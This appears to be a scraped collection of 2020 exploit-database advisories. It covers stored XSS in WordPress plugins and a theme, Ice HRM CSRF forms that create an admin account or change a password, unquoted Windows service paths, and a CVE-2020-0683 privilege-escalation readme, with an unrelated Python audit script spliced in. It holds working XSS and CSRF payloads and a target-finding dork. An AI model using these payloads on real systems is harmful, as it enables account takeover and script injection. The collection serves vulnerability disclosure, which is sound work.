_wpnonce=001abb6a10&_wp_http_referer=%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit%26message%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=wpm-testimonial&original_post_status=publish&referredby=http%3A%2F%2Ftesting.com%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2Ftesting.com%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit&post_ID=24879&meta-box-order-nonce=b39d630598&closedpostboxesnonce=6436439491&original_post_title=XSS+Test&post_title=XSS+Test&samplepermalinknonce=d93284f5e5&content=&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=01&jj=22&aa=2020&hh=18&mn=02&ss=28&hidden_mm=01&cur_mm=02&hidden_jj=22&cur_jj=15&hidden_aa=2020&cur_aa=2020&hidden_hh=18&cur_hh=15&hidden_mn=02&cur_mn=23&original_publish=Update&save=Update&tax_input%5Bwpm-testimonial-category%5D%5B%5D=0&newwpm-testimonial-category=New+Category+Name&newwpm-testimonial-category_parent=-1&_ajax_nonce-add-wpm-testimonial-category=f7661627a5&menu_order=0&_thumbnail_id=-1&custom%5Bclient_name%5D=%3Cscript%3Ealert%28%27all+testimonials+page%27%29%3C%2Fscript%3E&custom%5Bemail%5D=&custom%5Bcompany_name%5D=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&custom%5Bcompany_website%5D=&custom%5Bnofollow%5D=default&excerpt=&post_name=creator

3. Timeline
Vulnerability reported to the Strong Testimonials team – January 23, 2020
Strong Testimonials version 2.40.1 containing the fix released – January 25, 2020
-
HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path
# Exploit Title: HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path
# Discovery by: Roberto Piña
# Discovery Date: 2020-02-14
# Vendor Homepage: https://www8.hp.com/mx/es/home.html
# Software Link: ftp://ftp.hp.com/pub/softpaq/sp70001-70500/sp70439.exe
# HP Development Company, L.P.
# Tested Version: 1.2.9.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Home x64 en

# Step to discover Unquoted Service Path:

C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "HP" | findstr /i /v """
HPWMISVC    HPWMISVC    C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe    Auto

C:\>sc qc HPWMISVC
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: HPWMISVC
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : HPWMISVC
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>

# Exploit:
# A successful attempt would require the local user to be able to insert their code in the system
# root path undetected by the OS or other security applications where it could potentially be
# executed during application startup or reboot. If successful, the local user's code would
# execute with the elevated privileges of the application.
-
BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path
# Exploit Title: BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path
# Exploit Author: boku
# Date: 2020-02-10
# Vendor Homepage: https://www.weird-solutions.com
# Software Link: https://www.weird-solutions.com/download/products/bootpt_demo_IA32.exe
# Version: 2.0.1214
# Tested On: Windows 10 (32-bit)

C:\Users\user>wmic service get name, pathname, startmode | findstr "BOOTP" | findstr /i /v """
BOOTP Turbo   C:\Program Files\BOOTP Turbo\bootpt.exe   Auto

C:\Users\user>sc qc "BOOTP Turbo"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: BOOTP Turbo
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\BOOTP Turbo\bootpt.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : BOOTP Turbo
        DEPENDENCIES       : Nsi
                           : Afd
                           : NetBT
                           : Tcpip
        SERVICE_START_NAME : LocalSystem
-
MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation
# Exploit Title: MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation
# Author: nu11secur1ty
# Date: 2020-02-14
# Vendor: Microsoft
# Link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0683/nu11secur1ty
# CVE: CVE-2020-0683

[+] Credits: Ventsislav Varbanovski (@ nu11secur1ty)
[+] Website: https://www.nu11secur1ty.com/
[+] Source: readme from GitHUB
[+] twitter.com/nu11secur1ty

[Exploit Program]
Link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0683/nu11secur1ty

[Vendor]
Microsoft

[Vulnerability Type]
Windows Installer Elevation of Privilege Vulnerability

[CVE Reference]
An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links. An attacker who successfully exploited this vulnerability could bypass access restrictions to add or remove files. To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and add or remove files. The security update addresses the vulnerability by modifying how reparse points are handled by the Windows Installer.

[Security Issue]
Elevation of Privilege from user to C:\Windows\administration execution files

[References]
# CVE-2020-0683
Original PoC sent to MSRC.
Assigned to CVE-2020-0683 - Windows Installer Elevation of Privilege
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0683
Source code for Visual Studio C++ 2019
Inside "nu11secur1ty" you'll find the exploit (exe) to execute.

# Note: This test is using `system.ini` in c:\Windows\system.ini
When you exploit this file you should replace with the original file `system.ini` after this test, which you will find in CVE-2020-0683 directory :)
--------------------------------------------------------------------------

- How to run the exploit
Go into "nu11secur1ty" directory and from a cmd console launch:
- for the test
MsiExploit.exe c:\Windows\system.ini"
Be sure that both "MsiExploit.exe" and "foo.msi" reside in the same directory.

[Network Access]
Local

[Disclosure Timeline]
02/11/2020

[Disclaimer]
The entry creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

nu11secur1ty
--
-
Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)
# Exploit Title: Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)
# Date: 2020-02-14
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://icehrm.com/
# Software Link: https://sourceforge.net/projects/icehrm/
# Version 26.2.0
# Tested on Windows 10/Kali Rolling

# The Ice HRM Web Application is vulnerable to CSRF that leads to arbitrary user creation or password change:

# POC for user creation:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://HOSTHERE/icehrm/app/service.php">
      <input type="hidden" name="t" value="User" />
      <input type="hidden" name="a" value="ca" />
      <input type="hidden" name="sa" value="saveUser" />
      <input type="hidden" name="mod" value="admin=users" />
      <input type="hidden" name="req" value="{&quot;username&quot;:&quot;test&quot;,&quot;email&quot;:&quot;test@test.com&quot;,&quot;employee&quot;:&quot;1&quot;,&quot;user_level&quot;:&quot;Admin&quot;,&quot;user_roles&quot;:&quot;[\&quot;2\&quot;]&quot;,&quot;lang&quot;:&quot;NULL&quot;,&quot;default_module&quot;:&quot;NULL&quot;,&quot;csrf&quot;:&quot;c0bdded55472fab56c578386143a1854e6f8dd11&quot;}" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

# POC for Password Change:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://HOSTHERE/icehrm/app/service.php">
      <input type="hidden" name="t" value="User" />
      <input type="hidden" name="a" value="ca" />
      <input type="hidden" name="sa" value="changePassword" />
      <input type="hidden" name="mod" value="admin=users" />
      <input type="hidden" name="req" value="{&quot;id&quot;:1,&quot;pwd&quot;:&quot;admin123&quot;}" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
-
WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting
# Exploit Title: WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting
# Dork: intext:"Fruitful theme by fruitfulcode Powered by: WordPress" intext:"Comment" intext:"Leave a Reply"
# Date: 2020-02-14
# Category : Webapps
# Software Link: https://downloads.wordpress.org/theme/fruitful.3.8.zip
# Vendor Homepage: https://github.com/Fruitfulcode/Fruitful
# Exploit Author: Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari)
# Team Members: Behzad Khalifeh , Milad Ranjbar
# Version: 3.8
# Tested on: Windows/Linux
# CVE: N/A

.:: Theme Description ::.
Fruitful is a free responsive WordPress theme with a powerful theme options panel and a simple, clean front-end design.

.:: Proof Of Concept (PoC) ::.
Step 1 - Find your target with the above dork.
Step 2 - Inject your JavaScript code into the Name & Email fields.
Step 3 - Click Post Comment.

.:: Tested Payload ::.
'>"><script>alert(/XSS By UltraSecurity/)</script>

.:: Post Request ::.
comment=XSS :)&author='>"><script>alert(/Xssed By Ultra Security/)</script>&email='>"><script>alert(/Xssed By Ultra Security/)</script>&url=UltraSec.org&submit=Post Comment&comment_post_ID=1&comment_parent=0&akismet_comment_nonce=9cd073a8bd&ak_js=1581431825145
-
DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path
# Exploit Title: DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path
# Exploit Author: boku
# Date: 2020-02-10
# Vendor Homepage: https://www.weird-solutions.com
# Software Link: https://www.weird-solutions.com/download/products/dhcptv4_retail_IA32.exe
# Version: 4.6.1298
# Tested On: Windows 10 (32-bit)

C:\Users\user>sc qc "DHCP Turbo 4"
SERVICE_NAME: DHCP Turbo 4
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\DHCP Turbo 4\dhcpt.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DHCP Turbo 4
        DEPENDENCIES       : Nsi
                           : Afd
                           : NetBT
                           : Tcpip
        SERVICE_START_NAME : LocalSystem

C:\Users\user>wmic service get name, pathname, startmode | findstr "Turbo"
DisplayName   PathName                                  StartMode
DHCP Turbo 4  C:\Program Files\DHCP Turbo 4\dhcpt.exe   Auto
-
TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path
# Exploit Title: TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path
# Exploit Author: boku
# Date: 2020-02-10
# Vendor Homepage: https://www.weird-solutions.com
# Software Link: https://www.weird-solutions.com/download/products/tftptv4_retail_IA32.exe
# Version: 4.6.1273
# Tested On: Windows 10 (32-bit)

C:\Users\nightelf>wmic service get name, pathname, startmode | findstr "TFTP" | findstr /i /v """
TFTP Turbo 4   C:\Program Files\TFTP Turbo 4\tftpt.exe   Auto

C:\Users\nightelf>sc qc "TFTP Turbo 4"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: TFTP Turbo 4
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\TFTP Turbo 4\tftpt.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : TFTP Turbo 4
        DEPENDENCIES       : Nsi
                           : Afd
                           : NetBT
                           : Tcpip
        SERVICE_START_NAME : LocalSystem
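An added audit example serving the four unquoted-service-path entries above (HP System Event, BOOTP Turbo, DHCP Turbo and TFTP Turbo); it is not code from those advisories or the vendors. It parses the same `wmic service get name, pathname, startmode` output the entries show, flags paths that are unquoted and contain a space, and produces the `sc config` command that quotes them. The service inventory is a constructed sample: the two Turbo rows mirror the entries above, the other rows are invented controls.

```python
import re

# Constructed service inventory: the BOOTP/TFTP Turbo rows mirror the
# entries above; the rest are invented controls (a quoted path, a
# Windows-directory path and an unquoted path that carries arguments).
SERVICE_ROWS = [
    ("BOOTP Turbo", r"C:\Program Files\BOOTP Turbo\bootpt.exe", "Auto"),
    ("TFTP Turbo 4", r"C:\Program Files\TFTP Turbo 4\tftpt.exe", "Auto"),
    ("SafeSvc", r'"C:\Program Files\Safe Vendor\safe.exe"', "Auto"),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe", "Auto"),
    ("LabTool", r"C:\Program Files\Lab Tool\tool.exe -svc", "Manual"),
]


def render_wmic(rows):
    """Lay rows out the way wmic prints them: space-padded fixed columns."""
    w0 = max([len(r[0]) for r in rows] + [4]) + 2
    w1 = max([len(r[1]) for r in rows] + [8]) + 2
    out = ["Name".ljust(w0) + "PathName".ljust(w1) + "StartMode"]
    for name, path, mode in rows:
        out.append(name.ljust(w0) + path.ljust(w1) + mode)
    return "\n".join(out) + "\n"


SAMPLE_WMIC = render_wmic(SERVICE_ROWS)


def parse_wmic(text):
    """Split wmic's fixed-width table at the header's column offsets; splitting
    on whitespace would break because service names contain spaces."""
    lines = [l.rstrip() for l in text.splitlines() if l.strip()]
    cols = [(m.group(0), m.start()) for m in re.finditer(r"\S+", lines[0])]
    rows = []
    for line in lines[1:]:
        row = {}
        for i, (col, start) in enumerate(cols):
            end = cols[i + 1][1] if i + 1 < len(cols) else len(line)
            row[col] = line[start:end].strip()
        rows.append(row)
    return rows


def is_unquoted_with_spaces(pathname):
    """Unquoted image path whose executable part contains a space: the
    service control manager passes it to CreateProcess, which tries each
    space-delimited prefix as a program name before the intended file."""
    if pathname.startswith('"'):
        return False
    m = re.match(r"(?i)^(.*?\.exe)(\s|$)", pathname)
    exe = m.group(1) if m else pathname
    return " " in exe


def audit(text):
    """(name, path, startmode) for every affected service outside the
    Windows directory (the advisories' findstr filter); Auto-start first."""
    findings = []
    for row in parse_wmic(text):
        path = row["PathName"]
        if path.lower().startswith("c:\\windows\\"):
            continue
        if is_unquoted_with_spaces(path):
            findings.append((row["Name"], path, row["StartMode"]))
    findings.sort(key=lambda f: f[2] != "Auto")
    return findings


def fix_command(name, pathname):
    """sc.exe command that re-registers the image path with the executable
    quoted (the space after 'binPath=' is required by sc's parser)."""
    m = re.match(r"(?i)^(.*?\.exe)(.*)$", pathname)
    exe, args = (m.group(1), m.group(2)) if m else (pathname, "")
    return 'sc config "%s" binPath= "\\"%s\\"%s"' % (name, exe, args)
```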
-
WordPress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting
# Exploit Title: WordPress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting
# Date: 2020-02-15
# Exploit Author: Shahab.ra.9
# Vendor Homepage: https://products-filter.com/
# Software Link: https://wordpress.org/plugins/woocommerce-products-filter/
# Version: 1.2.3
# Tested on: Windows 10

# WOOF - Products Filter for WooCommerce

Exploit:
http://target/wp-admin/admin.php?page=wc-settings&tab=woof
Now in the "design" tab, enter the XSS code in the front-side text fields (Text for block toggle, Text for block toggle, Custom front css styles file link), then click the "save changes" button. Then refresh the page; now you see the execution of the XSS code. Then refresh the frontend page of the site ("http://target/shop/") or the frontend pages that use this plugin, and the XSS code executes there.

Demo PoC:
http://target/wp-admin/admin.php?page=wc-settings&tab=woof
Now in the "design" tab, enter ( ";</script><img src=1 onerror="alert(`xss store bug -> shahab.ra.9`);"><script>var1="1 ) in the front-side text fields (Text for block toggle, Text for block toggle and Custom front css styles file link), then click the "save changes" button.